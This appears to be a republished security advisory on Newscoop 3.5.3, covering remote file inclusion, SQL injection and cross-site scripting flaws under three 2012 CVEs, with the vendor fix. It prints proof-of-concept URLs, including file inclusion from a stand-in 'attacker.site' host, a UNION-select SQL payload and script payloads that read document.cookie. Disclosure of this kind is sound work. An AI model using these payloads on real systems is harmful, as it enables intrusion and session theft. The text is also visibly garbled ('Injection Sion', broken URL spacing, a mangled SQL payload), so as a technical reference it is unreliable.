Newscoop 3.5.3 multiple defects and repair

Source: Internet
Author: User

Involved products: Newscoop
 
Author: Sourcefabric o. p.s.
 
Affected Versions: 3.5.3 and probably prior, partially 4.0 RC3
 
Tested version: 3.5.3
 
Vulnerability Type: Remote File Injection Sion, SQL Injection, Cross-Site Scripting (XSS)
 
CVE Reference (s): CVE-2012-1933, CVE-2012-1934, CVE-2012-1935
 
Solution: The developer has upgraded

Risk Level: High
 
Credit: High-Tech Bridge SA Security Research Lab (https://www.htbridge.com/advisory)
 

Analysis

 
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Newscoop, which can be exploited to perform Remote File Injection, SQL Injection and Cross-Site Scripting (XSS) attacks.
 

 

 
1) Multiple Remote File Transfer sion in Newscoop: CVE-2012-1933
 

 
1.1 Input passed via "GLOBALS [g_campsiteDir]" GET parameter to/include/phorum_load.php is not properly verified before being used in require_once () function and can be exploited to include arbitrary remote files.
 

 
The following PoC (Proof Concept) demonstrates the vulnerability:
 

 
Http://www.bkjia.com/include/phorum_load.php? GLOBALS [g_campsiteDir] = http://attacker.site/file%00
 

 
1.2 Input passed via the "GLOBALS [g_campsiteDir]" GET parameter to/conf/install_conf.php is not properly verified before being used in require_once () function and can be exploited to include arbitrary remote files.
 

 
The following PoC demonstrates the vulnerability:
 

 
Http: // [host]/conf/install_conf.php? GLOBALS [g_campsiteDir] = http://attacker.site/file%00
 

 
1.3 Input passed via "GLOBALS [g_campsiteDir]" GET parameter to/conf/liveuser_configuration.php is not properly verified before being used in require_once () function and can be exploited to include arbitrary remote files.
 

 
The following PoC demonstrates the vulnerability:
 

 
Http: // [host]/conf/liveuser_configuration.php? GLOBALS [g_campsiteDir] = http://attacker.site/file%00
 

 
Successful exploitation of these vulnerabilities (1.1-1.3) requires that "register_globals" is enabled.
 

 

 
2) SQL Injection in Newscoop: CVE-2012-1934
 

 
2.1 Input passed via the "f_country_code" GET parameter to/admin/country/edit. php is not properly sanitised before being used in SQL query.
 
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
 

 
The following PoC (Proof Concept) demonstrates the vulnerability:
 

 
Http://www.bkjia.com/admin/country/edit. php? F_country_code = % 27% 20 union % 20 select % ,,2, version % 28% 29% 20 -- % 202
 

 
Successful exploitation of the vulnerability requires attacker to be registered and logged-in and to have permission to manage countries. For successful exploitation "Limit" shocould be disabled as well.
 

 

 
3) Multiple Cross-Site Scripting (XSS) in Newscoop: CVE-2012-1935
 

 
3.1 Input passed via the "Back" GET parameter to/admin/ad. php is not properly sanitised before being returned to the user.
 
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of the affected website.
 

 
The following PoC (Proof Concept) demonstrates the vulnerability:
 

 
Http: // [host]/admin/ad. php? Back = % 27% 22% 3E % 3 Cscript % 3 Ealert % 28document. cookie % 29; % 3C/script % 3E
 

 
3.2 Input passed via the "error_code" GET parameter to/admin/login. php is not properly sanitised before being returned to the user.
 
This can be exploited to execute arbitrary HTML and script code in user's browser session in context of the affected website.
 

 
The following PoC demonstrates the vulnerability:
 

 
Http: // [host]/admin/login. php? Error_code = upgrade & f_user_name = % 22% 3E % 3 Cscript % 3 Ealert % 28document. cookie % 29; % 3C/script % 3E
 

 
3.3 Input passed via the "token" and "f_email" GET parameters to/admin/password_check_token.php is not properly sanitised before being returned to the user.
 
This can be exploited to execute arbitrary HTML and script code in user's browser session in context of the affected website.
 

 
The following PoC demonstrate the vulnerabilities:
 

 
Http: // [host]/admin/password_check_token.php? Token = 1 & f_email = % 22% 3E % 3 Cscript % 3 Ealert % 28document. cookie % 29; % 3C/script % 3E
 
Http: // [host]/admin/password_check_token.php? F_email = 1 & token = % 22% 3E % 3 Cscript % 3 Ealert % 28document. cookie % 29; % 3C/script % 3E
 

 
Bytes -----------------------------------------------------------------------------------------------
 

Solution
 
Upgrade to Newscoop 3.5.5
 
Make sure that "register_globals" is set to off (fix for CVE-2012-1933)
 

 
More Information:
 
Http://www.sourcefabric.org/en/newscoop/latestrelease/1141/Newscoop-355-and-Newscoop-4-RC4-security-releases.htm
 
Http://dev.sourcefabric.org/browse/CS-4179
 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.